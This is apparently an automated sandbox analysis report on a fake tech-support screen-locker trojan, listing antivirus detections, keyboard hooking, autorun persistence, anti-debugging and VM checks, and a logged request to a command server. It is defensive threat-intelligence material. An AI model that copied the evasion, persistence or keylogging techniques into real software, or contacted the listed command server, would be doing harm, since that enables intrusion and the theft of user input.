9.0
Critical

377096fe03972ed7b661a7822969a5db0407902dddec756b30d2fa09547e194f

4c385e2bea8f5d1fae0c8629413c3f4b.exe

Analysis time

128s

Last analyzed

File size

64.8KB
Static detection: yes. Dynamic detection: yes. Tags: 100% AI SCORE=100 ARTEMIS CLASSIC CONFIDENCE EM1@AQV19TB FAKEALERT FAKESUPPORT FAKESUPPORTSCAM HIGH CONFIDENCE KCLOUD MALCERT MALICIOUS PE MALWARE@#2G356V2NP40JS PDMM QUCH RBPFO SAVE SCORE SCREENLOCK STATIC AI SUSGEN TECHSUPPORTSCAM UNSAFE ZEMSILF
Eagle Eye engine
Not detected: no Eagle Eye engine results are available for this sample
Static verdict
Antivirus engines
Engine | Result | Scan date | Engine version
McAfee Artemis!4C385E2BEA8F 20210222 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20210203 1.0
Alibaba Trojan:MSIL/FakeSupport.5d9dbb0c 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Trojan-gen 20210222 21.1.5827.0
Kingsoft Win32.Troj.Undef.(kcloud) 20210222 2017.9.26.565
Tencent Msil.Trojan.Fakesupport.Pdmm 20210222 1.0.0.1
Static indicators
Queries for the computername (50 out of 67 events)
Time & API Arguments Status Return Repeated
1619522247.62525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (2 events)
Time & API Arguments Status Return Repeated
1619522241.70325
IsDebuggerPresent
failed 0 0
1619522241.70325
IsDebuggerPresent
failed 0 0
This executable is signed
This executable has a PDB path (1 event)
pdb_path C:\Back up\backup\final source code\Pop Server\Win Act compatible\Win Act\Win Act\obj\Release\Win Act.pdb
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated
1619522241.71925
GlobalMemoryStatusEx
success 1 0
Behavioral verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)
suspicious_features GET method with no useragent header suspicious_request GET http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:4191545013&cup2hreq=c2401fc69b176bc59651af6d3e1f63b0387db022b0de83c4e2d7843aedd48b39
Performs some HTTP requests (5 events)
request GET http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=1bfb462cfdd3e97b&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:4191545013&cup2hreq=c2401fc69b176bc59651af6d3e1f63b0387db022b0de83c4e2d7843aedd48b39
Sends data using the HTTP POST Method (1 event)
request POST https://update.googleapis.com/service/update2?cup2key=10:4191545013&cup2hreq=c2401fc69b176bc59651af6d3e1f63b0387db022b0de83c4e2d7843aedd48b39
Allocates read-write-execute memory (usually to unpack itself) (50 out of 84 events)
Time & API Arguments Status Return Repeated
1619522240.42225
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x00420000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619522252.92225
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API Arguments Status Return Repeated
1619522244.23525
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Looks for the Windows Idle Time to determine the uptime (1 event)
Time & API Arguments Status Return Repeated
1619522251.42225
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
success 0 0
A process attempted to delay the analysis task. (1 event)
description 4c385e2bea8f5d1fae0c8629413c3f4b.exe tried to sleep 761157943 seconds, actually delayed analysis time by 761157943 seconds
Installs itself for autorun at Windows startup (1 event)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win Act reg_value C:\Users\Administrator.Oskar-PC\AppData\Roaming\Win_Act\Win Act\1.0.0.0\4c385e2bea8f5d1fae0c8629413c3f4b.exe
Creates a windows hook that monitors keyboard input (keylogger) (1 event)
Time & API Arguments Status Return Repeated
1619522244.23525
SetWindowsHookExW
thread_identifier: 0
callback_function: 0x02280d02
module_address: 0x00c90000
hook_identifier: 13 (WH_KEYBOARD_LL)
success 1114517 0
File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)
Elastic malicious (high confidence)
MicroWorld-eScan Generic.Malware.SLc.06803CAE
McAfee Artemis!4C385E2BEA8F
Cylance Unsafe
Zillya Trojan.FakeSupport.Win32.182
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:MSIL/FakeSupport.5d9dbb0c
K7GW Trojan ( 005695e91 )
K7AntiVirus Trojan ( 005695e91 )
Arcabit Generic.Malware.SLc.D1A93CAE
Cyren W32/Trojan.QUCH-9319
Symantec Trojan.Gen.MBT
Avast Win32:Trojan-gen
Kaspersky HEUR:Trojan.MSIL.FakeSupport.gen
BitDefender Generic.Malware.SLc.06803CAE
Paloalto generic.ml
Rising Trojan.MSIL.KeyLogger!1.647D (CLASSIC)
Ad-Aware Generic.Malware.SLc.06803CAE
Sophos Mal/Generic-S
Comodo Malware@#2g356v2np40js
F-Secure Trojan.TR/FakeSupport.rbpfo
DrWeb Trojan.Fakealert.59222
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.Malware.SLc.06803CAE
Emsisoft MalCert-S.CA (A)
SentinelOne Static AI - Malicious PE
eGambit Generic.Malware
Avira TR/FakeSupport.rbpfo
MAX malware (ai score=100)
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Agent.oa
Microsoft Trojan:MSIL/ScreenLock.MB!MTB
ZoneAlarm HEUR:Trojan.MSIL.FakeSupport.gen
GData Generic.Malware.SLc.06803CAE
Cynet Malicious (score: 85)
BitDefenderTheta Gen:NN.ZemsilF.34574.em1@aqv19Tb
ALYac Trojan.Ransom.TechSupportScam
Malwarebytes Trojan.FakeSupport
ESET-NOD32 a variant of MSIL/FakeSupport.DS
Tencent Msil.Trojan.Fakesupport.Pdmm
Ikarus Trojan.MSIL.FakeSupportScam
MaxSecure Trojan.Malware.9000873.susgen
Fortinet MSIL/FakeSupport.DS!tr
Webroot W32.Trojan.Gen
AVG Win32:Trojan-gen
Cybereason malicious.bea8f5
Qihoo-360 Generic/Trojan.604
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)
dead_host 172.217.160.78:443
dead_host 172.217.24.14:443
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were captured while the sample ran

PE Compile Time

2020-06-11 07:03:40

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Hosts

No hosts contacted.

TCP

Source | Source port | Destination IP | Destination host | Destination port
192.168.56.101 49189 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49190 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49188 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49187 203.208.41.98 update.googleapis.com 443
192.168.56.101 49181 208.109.25.159 themediafox.com 80

UDP

Source | Source port | Destination IP | Destination host (if resolved) | Destination port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 53500 114.114.114.114 53
192.168.56.101 54991 114.114.114.114 53
192.168.56.101 55169 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60911 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=1bfb462cfdd3e97b&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=1bfb462cfdd3e97b&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com

http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0
GET /hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0 HTTP/1.1
Host: themediafox.com

http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0
GET /hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0 HTTP/1.1
Host: themediafox.com
Connection: Keep-Alive

http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m&mvi=1&pl=23&shardbypass=yes
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.